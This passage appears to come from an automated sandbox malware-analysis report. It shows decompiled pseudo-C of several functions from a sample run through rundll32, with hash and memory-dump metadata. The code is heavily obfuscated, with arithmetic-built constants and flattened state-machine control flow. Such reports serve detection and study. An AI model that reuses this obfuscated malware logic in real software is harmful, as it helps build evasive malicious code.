                                                                                                                                  				_v8 = _v8 >> 4;
                                                                                                                                  				_v8 = _v8 << 5;
                                                                                                                                  				_v8 = _v8 ^ 0xdca434f7;
                                                                                                                                  				_v8 = _v8 ^ 0xdd0cf0dc;
                                                                                                                                  				_v44 = 0x6f20d8;
                                                                                                                                  				_v44 = _v44 >> 0xb;
                                                                                                                                  				_v44 = _v44 ^ 0xaa766a49;
                                                                                                                                  				_v44 = _v44 ^ 0xaa79f73d;
                                                                                                                                  				_v64 = 0x5810b3;
                                                                                                                                  				_t247 = 0x3e;
                                                                                                                                  				_v64 = _v64 * 0x13;
                                                                                                                                  				_v64 = _v64 ^ 0x068d2e2f;
                                                                                                                                  				_v60 = 0xa1705b;
                                                                                                                                  				_v60 = _v60 / _t247;
                                                                                                                                  				_v60 = _v60 ^ 0x000746d3;
                                                                                                                                  				_v12 = 0xe49076;
                                                                                                                                  				_v12 = _v12 | 0xf94b921d;
                                                                                                                                  				_t248 = 0x66;
                                                                                                                                  				_v12 = _v12 / _t248;
                                                                                                                                  				_v12 = _v12 | 0x30c6fb91;
                                                                                                                                  				_v12 = _v12 ^ 0x32fd72cc;
                                                                                                                                  				_v40 = 0x4af1f5;
                                                                                                                                  				_v40 = _v40 + 0xffff1f3a;
                                                                                                                                  				_v40 = _v40 + 0x5998;
                                                                                                                                  				_v40 = _v40 | 0x0efc634a;
                                                                                                                                  				_v40 = _v40 ^ 0x0ef1d3e1;
                                                                                                                                  				_v36 = 0xca0e2e;
                                                                                                                                  				_v36 = _v36 + 0xa6ab;
                                                                                                                                  				_v36 = _v36 * 0x17;
                                                                                                                                  				_v36 = _v36 | 0xed84f45f;
                                                                                                                                  				_v36 = _v36 ^ 0xffb3e96f;
                                                                                                                                  				_v32 = 0x9f068d;
                                                                                                                                  				_v32 = _v32 | 0xccdcedf7;
                                                                                                                                  				_v32 = _v32 >> 8;
                                                                                                                                  				_v32 = _v32 << 0x10;
                                                                                                                                  				_v32 = _v32 ^ 0xdfe821c7;
                                                                                                                                  				do {
                                                                                                                                  					while(_t216 != 0x5ccdb59) {
                                                                                                                                  						if(_t216 == 0x80e5149) {
                                                                                                                                  							_push(_v32);
                                                                                                                                  							_push(_t239);
                                                                                                                                  							_push(3);
                                                                                                                                  							_push(1);
                                                                                                                                  							E002D80E3(_v40, _v36);
                                                                                                                                  							 *((short*)(_t239 + 6)) = 0;
                                                                                                                                  							return 0;
                                                                                                                                  						}
                                                                                                                                  						if(_t216 == 0xb7209d2) {
                                                                                                                                  							_t211 = E002ED25E(_t216);
                                                                                                                                  							_t216 = 0x5ccdb59;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t216 != 0xeb2e9e3) {
                                                                                                                                  							goto L8;
                                                                                                                                  						}
                                                                                                                                  						_t214 = E002E0AE0(0x10, 4);
                                                                                                                                  						_push(_v12);
                                                                                                                                  						_t250 = _t214;
                                                                                                                                  						_push(_t239);
                                                                                                                                  						_push(_t250);
                                                                                                                                  						_push(1);
                                                                                                                                  						E002D80E3(_v64, _v60);
                                                                                                                                  						_t251 = _t251 + 0x18;
                                                                                                                                  						_t242 = _t239 + _t250 * 2;
                                                                                                                                  						_t216 = 0x80e5149;
                                                                                                                                  						_t211 = 0x2e;
                                                                                                                                  						 *_t242 = _t211;
                                                                                                                                  						_t239 = _t242 + 2;
                                                                                                                                  					}
                                                                                                                                  					_t203 = E002E0AE0(0x10, 4);
                                                                                                                                  					_push(_v24);
                                                                                                                                  					_t249 = _t203;
                                                                                                                                  					_push(_t239);
                                                                                                                                  					_push(1);
                                                                                                                                  					_push(2);
                                                                                                                                  					E002D80E3(_v68, _v56);
                                                                                                                                  					_push(_v72);
                                                                                                                                  					_t240 = _t239 + 2;
                                                                                                                                  					_push(_t240);
                                                                                                                                  					_push(_t249);
                                                                                                                                  					_push(1);
                                                                                                                                  					E002D80E3(_v28, _v76);
                                                                                                                                  					_t251 = _t251 + 0x28;
                                                                                                                                  					_t241 = _t240 + _t249 * 2;
                                                                                                                                  					_t216 = 0xeb2e9e3;
                                                                                                                                  					_t206 = 0x5c;
                                                                                                                                  					 *_t241 = _t206;
                                                                                                                                  					_t239 = _t241 + 2;
                                                                                                                                  					L8:
                                                                                                                                  				} while (_t216 != 0x3f21c37);
                                                                                                                                  				return _t211;
                                                                                                                                  			}











































                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ulG$wV
                                                                                                                                  • API String ID: 0-391097709
                                                                                                                                  • Opcode ID: 7e8ef17572d72543039c8ab255bb4e6a29b84583741f6cafc19d4f3fda4ee57e
                                                                                                                                  • Instruction ID: d83f0751ae9371a7d7e3a90af0ff69b1af5c34294dcd105be090c5780c2f44d8
                                                                                                                                  • Opcode Fuzzy Hash: 7e8ef17572d72543039c8ab255bb4e6a29b84583741f6cafc19d4f3fda4ee57e
                                                                                                                                  • Instruction Fuzzy Hash: 94915572D01219EBDB14DFE5D88A9DEBBB1FF44314F248109E216B6250D7B01A46CF95
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D59F2() {
                                                                                                                                  				char _v520;
                                                                                                                                  				char _v1040;
                                                                                                                                  				intOrPtr _v1044;
                                                                                                                                  				intOrPtr _v1048;
                                                                                                                                  				intOrPtr _v1052;
                                                                                                                                  				intOrPtr _v1056;
                                                                                                                                  				signed int _v1060;
                                                                                                                                  				signed int _v1064;
                                                                                                                                  				signed int _v1068;
                                                                                                                                  				signed int _v1072;
                                                                                                                                  				signed int _v1076;
                                                                                                                                  				signed int _v1080;
                                                                                                                                  				signed int _v1084;
                                                                                                                                  				signed int _v1088;
                                                                                                                                  				signed int _v1092;
                                                                                                                                  				signed int _v1096;
                                                                                                                                  				signed int _v1100;
                                                                                                                                  				signed int _v1104;
                                                                                                                                  				signed int _v1108;
                                                                                                                                  				signed int _v1112;
                                                                                                                                  				signed int _v1116;
                                                                                                                                  				signed int _v1120;
                                                                                                                                  				signed int _v1124;
                                                                                                                                  				signed int _v1128;
                                                                                                                                  				signed int _v1132;
                                                                                                                                  				signed int _v1136;
                                                                                                                                  				signed int _v1140;
                                                                                                                                  				void* _t202;
                                                                                                                                  				void* _t208;
                                                                                                                                  				intOrPtr _t209;
                                                                                                                                  				void* _t214;
                                                                                                                                  				void* _t222;
                                                                                                                                  				intOrPtr _t237;
                                                                                                                                  				intOrPtr _t240;
                                                                                                                                  				signed int _t241;
                                                                                                                                  				signed int _t242;
                                                                                                                                  				signed int _t243;
                                                                                                                                  				signed int _t244;
                                                                                                                                  				signed int* _t247;
                                                                                                                                  
                                                                                                                                  				_t247 =  &_v1140;
                                                                                                                                  				_v1056 = 0x36f622;
                                                                                                                                  				_v1052 = 0x8ed67e;
                                                                                                                                  				_t214 = 0xf737bb2;
                                                                                                                                  				_v1048 = 0x93fb3c;
                                                                                                                                  				_t240 = 0;
                                                                                                                                  				_v1044 = 0;
                                                                                                                                  				_v1076 = 0x48eb17;
                                                                                                                                  				_v1076 = _v1076 + 0x189d;
                                                                                                                                  				_v1076 = _v1076 ^ 0x00442401;
                                                                                                                                  				_v1100 = 0xa45863;
                                                                                                                                  				_v1100 = _v1100 << 2;
                                                                                                                                  				_t241 = 0x1d;
                                                                                                                                  				_v1100 = _v1100 * 0x7c;
                                                                                                                                  				_v1100 = _v1100 ^ 0x3e6538f4;
                                                                                                                                  				_v1108 = 0x56f1ad;
                                                                                                                                  				_v1108 = _v1108 | 0xbff0a597;
                                                                                                                                  				_v1108 = _v1108 / _t241;
                                                                                                                                  				_v1108 = _v1108 ^ 0x06946226;
                                                                                                                                  				_v1132 = 0xc3fd0a;
                                                                                                                                  				_v1132 = _v1132 << 8;
                                                                                                                                  				_v1132 = _v1132 + 0xffff9bc2;
                                                                                                                                  				_t242 = 0x18;
                                                                                                                                  				_v1132 = _v1132 / _t242;
                                                                                                                                  				_v1132 = _v1132 ^ 0x0821d39f;
                                                                                                                                  				_v1068 = 0xc66dea;
                                                                                                                                  				_v1068 = _v1068 + 0xffff0514;
                                                                                                                                  				_v1068 = _v1068 ^ 0x00c0919e;
                                                                                                                                  				_v1136 = 0x72811d;
                                                                                                                                  				_v1136 = _v1136 ^ 0x5ea2c622;
                                                                                                                                  				_t243 = 0x5d;
                                                                                                                                  				_v1136 = _v1136 * 0x4f;
                                                                                                                                  				_v1136 = _v1136 * 0x41;
                                                                                                                                  				_v1136 = _v1136 ^ 0xd3c4c324;
                                                                                                                                  				_v1096 = 0x2e25e6;
                                                                                                                                  				_v1096 = _v1096 ^ 0xbdbebaf9;
                                                                                                                                  				_v1096 = _v1096 ^ 0xbd932287;
                                                                                                                                  				_v1060 = 0x3d42d8;
                                                                                                                                  				_v1060 = _v1060 << 6;
                                                                                                                                  				_v1060 = _v1060 ^ 0x0f5887f2;
                                                                                                                                  				_v1116 = 0xec9c1f;
                                                                                                                                  				_v1116 = _v1116 >> 1;
                                                                                                                                  				_v1116 = _v1116 + 0xcef9;
                                                                                                                                  				_v1116 = _v1116 ^ 0x0078140d;
                                                                                                                                  				_v1084 = 0xf6a299;
                                                                                                                                  				_v1084 = _v1084 >> 9;
                                                                                                                                  				_v1084 = _v1084 ^ 0x00023821;
                                                                                                                                  				_v1124 = 0xf6e97d;
                                                                                                                                  				_v1124 = _v1124 + 0xffff8c4c;
                                                                                                                                  				_v1124 = _v1124 / _t243;
                                                                                                                                  				_v1124 = _v1124 | 0xda1c672f;
                                                                                                                                  				_v1124 = _v1124 ^ 0xda1e012d;
                                                                                                                                  				_v1120 = 0x9bdb66;
                                                                                                                                  				_v1120 = _v1120 * 0x47;
                                                                                                                                  				_v1120 = _v1120 + 0xdb13;
                                                                                                                                  				_v1120 = _v1120 * 0x64;
                                                                                                                                  				_v1120 = _v1120 ^ 0xe2e3c71f;
                                                                                                                                  				_v1112 = 0x9fec0e;
                                                                                                                                  				_v1112 = _v1112 << 0xc;
                                                                                                                                  				_v1112 = _v1112 | 0xd7512eb2;
                                                                                                                                  				_v1112 = _v1112 ^ 0xffdc645c;
                                                                                                                                  				_v1104 = 0xc74eee;
                                                                                                                                  				_v1104 = _v1104 + 0x930c;
                                                                                                                                  				_v1104 = _v1104 ^ 0x28280d38;
                                                                                                                                  				_v1104 = _v1104 ^ 0x28ef0d26;
                                                                                                                                  				_v1064 = 0xc36095;
                                                                                                                                  				_v1064 = _v1064 | 0x2d8f7273;
                                                                                                                                  				_v1064 = _v1064 ^ 0x2dcb1501;
                                                                                                                                  				_v1140 = 0xa3c477;
                                                                                                                                  				_v1140 = _v1140 ^ 0xb16da3ec;
                                                                                                                                  				_v1140 = _v1140 ^ 0x8917fdcb;
                                                                                                                                  				_v1140 = _v1140 >> 0xe;
                                                                                                                                  				_v1140 = _v1140 ^ 0x000e0fa0;
                                                                                                                                  				_v1128 = 0x58136;
                                                                                                                                  				_v1128 = _v1128 << 6;
                                                                                                                                  				_v1128 = _v1128 << 0x10;
                                                                                                                                  				_v1128 = _v1128 + 0xffffe729;
                                                                                                                                  				_v1128 = _v1128 ^ 0x4d79f308;
                                                                                                                                  				_v1072 = 0x735c84;
                                                                                                                                  				_t244 = 0x7f;
                                                                                                                                  				_v1072 = _v1072 / _t244;
                                                                                                                                  				_v1072 = _v1072 ^ 0x0002b970;
                                                                                                                                  				_v1080 = 0x91f75b;
                                                                                                                                  				_v1080 = _v1080 + 0xffffc39e;
                                                                                                                                  				_v1080 = _v1080 ^ 0x009f463e;
                                                                                                                                  				_v1088 = 0xdf4dcf;
                                                                                                                                  				_v1088 = _v1088 | 0x05792173;
                                                                                                                                  				_v1088 = _v1088 ^ 0x05f69aec;
                                                                                                                                  				_v1092 = 0xf44447;
                                                                                                                                  				_v1092 = _v1092 * 0x78;
                                                                                                                                  				_v1092 = _v1092 ^ 0x728504a1;
                                                                                                                                  				do {
                                                                                                                                  					while(_t214 != 0x89b0ee) {
                                                                                                                                  						if(_t214 == 0x291094f) {
                                                                                                                                  							E002D3C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
                                                                                                                                  						} else {
                                                                                                                                  							if(_t214 == 0x6a25a64) {
                                                                                                                                  								E002EDA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
                                                                                                                                  								_t247 =  &(_t247[4]);
                                                                                                                                  								_t214 = 0xe0c4196;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t214 == 0xe0c4196) {
                                                                                                                                  									_push(_v1096);
                                                                                                                                  									_push(_v1136);
                                                                                                                                  									_t208 = E002EDCF7(_v1068, 0x2d1000, __eflags);
                                                                                                                                  									_pop(_t222);
                                                                                                                                  									_t209 =  *0x2f3e10; // 0x0
                                                                                                                                  									_t237 =  *0x2f3e10; // 0x0
                                                                                                                                  									E002D47CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
                                                                                                                                  									E002DA8B0(_v1112, _t208, _v1104);
                                                                                                                                  									_t247 =  &(_t247[9]);
                                                                                                                                  									_t214 = 0x89b0ee;
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t214 != 0xf737bb2) {
                                                                                                                                  										goto L10;
                                                                                                                                  									} else {
                                                                                                                                  										_t214 = 0x6a25a64;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L13:
                                                                                                                                  						return _t240;
                                                                                                                                  					}
                                                                                                                                  					_push(_v1128);
                                                                                                                                  					_push( &_v1040);
                                                                                                                                  					_push(_v1140);
                                                                                                                                  					_t202 = E002F13AD(_v1064,  &_v520, __eflags);
                                                                                                                                  					_t247 =  &(_t247[3]);
                                                                                                                                  					__eflags = _t202;
                                                                                                                                  					_t240 =  !=  ? 1 : _t240;
                                                                                                                                  					_t214 = 0x291094f;
                                                                                                                                  					L10:
                                                                                                                                  					__eflags = _t214 - 0xb653a05;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L13;
                                                                                                                                  			}

                                                                                                                                  0x002d5b14
                                                                                                                                  0x002d5b1c
                                                                                                                                  0x002d5b24
                                                                                                                                  0x002d5b28
                                                                                                                                  0x002d5b30
                                                                                                                                  0x002d5b38
                                                                                                                                  0x002d5b40
                                                                                                                                  0x002d5b45
                                                                                                                                  0x002d5b4d
                                                                                                                                  0x002d5b55
                                                                                                                                  0x002d5b63
                                                                                                                                  0x002d5b67
                                                                                                                                  0x002d5b6f
                                                                                                                                  0x002d5b77
                                                                                                                                  0x002d5b84
                                                                                                                                  0x002d5b88
                                                                                                                                  0x002d5b95
                                                                                                                                  0x002d5b99
                                                                                                                                  0x002d5ba1
                                                                                                                                  0x002d5ba9
                                                                                                                                  0x002d5bae
                                                                                                                                  0x002d5bb6
                                                                                                                                  0x002d5bbe
                                                                                                                                  0x002d5bc8
                                                                                                                                  0x002d5bd5
                                                                                                                                  0x002d5be2
                                                                                                                                  0x002d5bea
                                                                                                                                  0x002d5bf2
                                                                                                                                  0x002d5bfa
                                                                                                                                  0x002d5c02
                                                                                                                                  0x002d5c0a
                                                                                                                                  0x002d5c12
                                                                                                                                  0x002d5c1a
                                                                                                                                  0x002d5c1f
                                                                                                                                  0x002d5c27
                                                                                                                                  0x002d5c2f
                                                                                                                                  0x002d5c34
                                                                                                                                  0x002d5c39
                                                                                                                                  0x002d5c41
                                                                                                                                  0x002d5c49
                                                                                                                                  0x002d5c57
                                                                                                                                  0x002d5c5a
                                                                                                                                  0x002d5c5e
                                                                                                                                  0x002d5c66
                                                                                                                                  0x002d5c6e
                                                                                                                                  0x002d5c76
                                                                                                                                  0x002d5c7e
                                                                                                                                  0x002d5c86
                                                                                                                                  0x002d5c8e
                                                                                                                                  0x002d5c96
                                                                                                                                  0x002d5ca3
                                                                                                                                  0x002d5ca7
                                                                                                                                  0x002d5caf
                                                                                                                                  0x002d5caf
                                                                                                                                  0x002d5cc1
                                                                                                                                  0x002d5dc8
                                                                                                                                  0x002d5cc7
                                                                                                                                  0x002d5cc9
                                                                                                                                  0x002d5d69
                                                                                                                                  0x002d5d6e
                                                                                                                                  0x002d5d71
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5ccf
                                                                                                                                  0x002d5cd1
                                                                                                                                  0x002d5ce3
                                                                                                                                  0x002d5cec
                                                                                                                                  0x002d5cf4
                                                                                                                                  0x002d5cfa
                                                                                                                                  0x002d5d05
                                                                                                                                  0x002d5d1c
                                                                                                                                  0x002d5d2f
                                                                                                                                  0x002d5d3e
                                                                                                                                  0x002d5d43
                                                                                                                                  0x002d5d46
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5cd3
                                                                                                                                  0x002d5cd9
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5cdf
                                                                                                                                  0x002d5cdf
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5cdf
                                                                                                                                  0x002d5cd9
                                                                                                                                  0x002d5cd1
                                                                                                                                  0x002d5cc9
                                                                                                                                  0x002d5dd0
                                                                                                                                  0x002d5ddc
                                                                                                                                  0x002d5ddc
                                                                                                                                  0x002d5d78
                                                                                                                                  0x002d5d80
                                                                                                                                  0x002d5d81
                                                                                                                                  0x002d5d90
                                                                                                                                  0x002d5d97
                                                                                                                                  0x002d5d9b
                                                                                                                                  0x002d5d9d
                                                                                                                                  0x002d5da0
                                                                                                                                  0x002d5da5
                                                                                                                                  0x002d5da5
                                                                                                                                  0x002d5da5
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: &($&(
                                                                                                                                  • API String ID: 0-3969885665
                                                                                                                                  • Opcode ID: 11f1de94f761288969a8db5887db5e790ac00a2b2252a61fa8d729cad849c648
                                                                                                                                  • Instruction ID: 322c0709215a2b7de78d34e47eab02f3a3671016ed3670343111c735c0605e63
                                                                                                                                  • Opcode Fuzzy Hash: 11f1de94f761288969a8db5887db5e790ac00a2b2252a61fa8d729cad849c648
                                                                                                                                  • Instruction Fuzzy Hash: 88A130B11183819FC758CF26C58941BFBF2FBC4758F108A1EF5A696220D7B58A19CF46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E002D6D24() {
                                                                                                                                  				char _v524;
                                                                                                                                  				signed int _v528;
                                                                                                                                  				signed int _v532;
                                                                                                                                  				signed int _v536;
                                                                                                                                  				signed int _v540;
                                                                                                                                  				signed int _v544;
                                                                                                                                  				signed int _v548;
                                                                                                                                  				signed int _v552;
                                                                                                                                  				signed int _v556;
                                                                                                                                  				signed int _v560;
                                                                                                                                  				signed int _v564;
                                                                                                                                  				signed int _v568;
                                                                                                                                  				signed int _v572;
                                                                                                                                  				signed int _v576;
                                                                                                                                  				signed int _v580;
                                                                                                                                  				signed int _v584;
                                                                                                                                  				signed int _v588;
                                                                                                                                  				signed int _v592;
                                                                                                                                  				short* _t158;
                                                                                                                                  				void* _t161;
                                                                                                                                  				void* _t164;
                                                                                                                                  				intOrPtr _t173;
                                                                                                                                  				intOrPtr _t188;
                                                                                                                                  				signed int _t192;
                                                                                                                                  				signed int _t193;
                                                                                                                                  				signed int _t194;
                                                                                                                                  				signed int _t195;
                                                                                                                                  				void* _t198;
                                                                                                                                  
                                                                                                                                  				_v556 = 0x5b9523;
                                                                                                                                  				_v556 = _v556 ^ 0xd644881d;
                                                                                                                                  				_t164 = 0xafec1cc;
                                                                                                                                  				_v556 = _v556 ^ 0xd61fc18a;
                                                                                                                                  				_v560 = 0xf0211a;
                                                                                                                                  				_v560 = _v560 >> 0xc;
                                                                                                                                  				_v560 = _v560 >> 0xf;
                                                                                                                                  				_v560 = _v560 ^ 0x000d86e8;
                                                                                                                                  				_v536 = 0x5b86ee;
                                                                                                                                  				_t192 = 0x7a;
                                                                                                                                  				_v536 = _v536 / _t192;
                                                                                                                                  				_v536 = _v536 ^ 0x00051f37;
                                                                                                                                  				_v528 = 0x15dba1;
                                                                                                                                  				_v528 = _v528 + 0xffff3226;
                                                                                                                                  				_v528 = _v528 ^ 0x001c60e6;
                                                                                                                                  				_v564 = 0xcdfacc;
                                                                                                                                  				_v564 = _v564 ^ 0x78a7d3e3;
                                                                                                                                  				_v564 = _v564 << 0xe;
                                                                                                                                  				_v564 = _v564 ^ 0x8a48a6fd;
                                                                                                                                  				_v572 = 0x7eccf1;
                                                                                                                                  				_v572 = _v572 + 0xffffd1bc;
                                                                                                                                  				_t193 = 0x2e;
                                                                                                                                  				_v572 = _v572 * 0x26;
                                                                                                                                  				_v572 = _v572 ^ 0x12c53124;
                                                                                                                                  				_v588 = 0x8dc921;
                                                                                                                                  				_v588 = _v588 | 0x53df5653;
                                                                                                                                  				_v588 = _v588 << 7;
                                                                                                                                  				_v588 = _v588 * 0x73;
                                                                                                                                  				_v588 = _v588 ^ 0xc8beb34e;
                                                                                                                                  				_v544 = 0xe1fa74;
                                                                                                                                  				_v544 = _v544 + 0xffffe6ac;
                                                                                                                                  				_v544 = _v544 ^ 0x00e0f2b8;
                                                                                                                                  				_v568 = 0x925246;
                                                                                                                                  				_v568 = _v568 + 0xffffcd65;
                                                                                                                                  				_v568 = _v568 + 0xffffdee0;
                                                                                                                                  				_v568 = _v568 ^ 0x009eae97;
                                                                                                                                  				_v576 = 0x3c09b4;
                                                                                                                                  				_v576 = _v576 + 0xffff2c4c;
                                                                                                                                  				_v576 = _v576 >> 0xa;
                                                                                                                                  				_v576 = _v576 ^ 0x000cc2c3;
                                                                                                                                  				_v592 = 0xac7846;
                                                                                                                                  				_v592 = _v592 ^ 0xbb2572b9;
                                                                                                                                  				_v592 = _v592 ^ 0xeb3265e6;
                                                                                                                                  				_v592 = _v592 | 0x6a541c4b;
                                                                                                                                  				_v592 = _v592 ^ 0x7af30806;
                                                                                                                                  				_v548 = 0xb1a24a;
                                                                                                                                  				_v548 = _v548 / _t193;
                                                                                                                                  				_v548 = _v548 ^ 0x00094ccb;
                                                                                                                                  				_v552 = 0xbe5b93;
                                                                                                                                  				_v552 = _v552 | 0xe01e3375;
                                                                                                                                  				_v552 = _v552 ^ 0xe0b0d42a;
                                                                                                                                  				_v532 = 0x76dce5;
                                                                                                                                  				_t194 = 0x19;
                                                                                                                                  				_v532 = _v532 / _t194;
                                                                                                                                  				_v532 = _v532 ^ 0x00002403;
                                                                                                                                  				_v584 = 0xffb3b0;
                                                                                                                                  				_v584 = _v584 << 0xc;
                                                                                                                                  				_v584 = _v584 ^ 0x8b2427a7;
                                                                                                                                  				_v584 = _v584 | 0x0ff5fda2;
                                                                                                                                  				_v584 = _v584 ^ 0x7ffdbf2b;
                                                                                                                                  				_v580 = 0x6f9ecd;
                                                                                                                                  				_t195 = 0x5b;
                                                                                                                                  				_v580 = _v580 / _t195;
                                                                                                                                  				_v580 = _v580 << 0xc;
                                                                                                                                  				_v580 = _v580 ^ 0x13a22276;
                                                                                                                                  				_v540 = 0xd8d341;
                                                                                                                                  				_v540 = _v540 * 0xb;
                                                                                                                                  				_v540 = _v540 ^ 0x095c7847;
                                                                                                                                  				do {
                                                                                                                                  					while(_t164 != 0x2dc4ff7) {
                                                                                                                                  						if(_t164 == 0x5cfc1e4) {
                                                                                                                                  							return E002D9DCF(_v532, _v584, _v580,  &_v524,  &_v524, E002D4EE3, _v540, 0);
                                                                                                                                  						}
                                                                                                                                  						if(_t164 == 0x9efe9dd) {
                                                                                                                                  							_push(_v536);
                                                                                                                                  							_push(_v560);
                                                                                                                                  							_t161 = E002EDCF7(_v556, 0x2d1000, __eflags);
                                                                                                                                  							_t173 =  *0x2f3e10; // 0x0
                                                                                                                                  							_t188 =  *0x2f3e10; // 0x0
                                                                                                                                  							E002D47CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
                                                                                                                                  							_t158 = E002DA8B0(_v568, _t161, _v576);
                                                                                                                                  							_t198 = _t198 + 0x24;
                                                                                                                                  							_t164 = 0x2dc4ff7;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t164 != 0xafec1cc) {
                                                                                                                                  							goto L8;
                                                                                                                                  						}
                                                                                                                                  						_t164 = 0x9efe9dd;
                                                                                                                                  					}
                                                                                                                                  					_t158 = E002DB6CF( &_v524, _v592, _v548, _v552);
                                                                                                                                  					__eflags = 0;
                                                                                                                                  					 *_t158 = 0;
                                                                                                                                  					_t164 = 0x5cfc1e4;
                                                                                                                                  					L8:
                                                                                                                                  					__eflags = _t164 - 0xdc02af8;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				return _t158;
                                                                                                                                  			}

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Gx\$e2
                                                                                                                                  • API String ID: 0-3912940318
                                                                                                                                  • Opcode ID: 0abe0ed10546ef6adb9caac49fe2e53893b6ef36bf90669511eca014793ec1a4
                                                                                                                                  • Instruction ID: d4a12b829eb8e093a3bdbbe40d22cea961385a580fef0d3a6da19219bc68b3a3
                                                                                                                                  • Opcode Fuzzy Hash: 0abe0ed10546ef6adb9caac49fe2e53893b6ef36bf90669511eca014793ec1a4
                                                                                                                                  • Instruction Fuzzy Hash: 2D7141711183419FC368CF21D88A81FBBF1FBC4758F209A1DF69696260D3B19A59CF86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002DA55F() {
                                                                                                                                  				char _v520;
                                                                                                                                  				signed int _v524;
                                                                                                                                  				signed int _v528;
                                                                                                                                  				intOrPtr _v532;
                                                                                                                                  				signed int _v536;
                                                                                                                                  				signed int _v540;
                                                                                                                                  				signed int _v544;
                                                                                                                                  				signed int _v548;
                                                                                                                                  				signed int _v552;
                                                                                                                                  				signed int _v556;
                                                                                                                                  				signed int _v560;
                                                                                                                                  				signed int _v564;
                                                                                                                                  				signed int _v568;
                                                                                                                                  				signed int _v572;
                                                                                                                                  				signed int _v576;
                                                                                                                                  				signed int _v580;
                                                                                                                                  				signed int _v584;
                                                                                                                                  				signed int _t161;
                                                                                                                                  				char* _t162;
                                                                                                                                  				intOrPtr _t164;
                                                                                                                                  				void* _t168;
                                                                                                                                  				signed int _t187;
                                                                                                                                  				signed int _t189;
                                                                                                                                  				signed int _t190;
                                                                                                                                  				signed int _t191;
                                                                                                                                  				signed int _t192;
                                                                                                                                  				short* _t195;
                                                                                                                                  				signed int* _t197;
                                                                                                                                  
                                                                                                                                  				_t197 =  &_v584;
                                                                                                                                  				_v528 = _v528 & 0x00000000;
                                                                                                                                  				_v524 = _v524 & 0x00000000;
                                                                                                                                  				_t168 = 0xe71c2f1;
                                                                                                                                  				_v532 = 0xa0346f;
                                                                                                                                  				_v560 = 0x45ed96;
                                                                                                                                  				_t187 = 0x29;
                                                                                                                                  				_v560 = _v560 / _t187;
                                                                                                                                  				_t189 = 0x5d;
                                                                                                                                  				_v560 = _v560 * 0x5e;
                                                                                                                                  				_v560 = _v560 ^ 0x00ac5e2c;
                                                                                                                                  				_v568 = 0x587b3f;
                                                                                                                                  				_v568 = _v568 >> 1;
                                                                                                                                  				_v568 = _v568 >> 6;
                                                                                                                                  				_v568 = _v568 + 0x3200;
                                                                                                                                  				_v568 = _v568 ^ 0x000d20ef;
                                                                                                                                  				_v540 = 0x1767bf;
                                                                                                                                  				_v540 = _v540 >> 0xa;
                                                                                                                                  				_v540 = _v540 ^ 0x00010300;
                                                                                                                                  				_v548 = 0xad8e3d;
                                                                                                                                  				_v548 = _v548 ^ 0x5762e507;
                                                                                                                                  				_v548 = _v548 ^ 0xbd28358e;
                                                                                                                                  				_v548 = _v548 ^ 0xeae8e106;
                                                                                                                                  				_v584 = 0xa1a61c;
                                                                                                                                  				_v584 = _v584 * 0x38;
                                                                                                                                  				_v584 = _v584 + 0xffff1963;
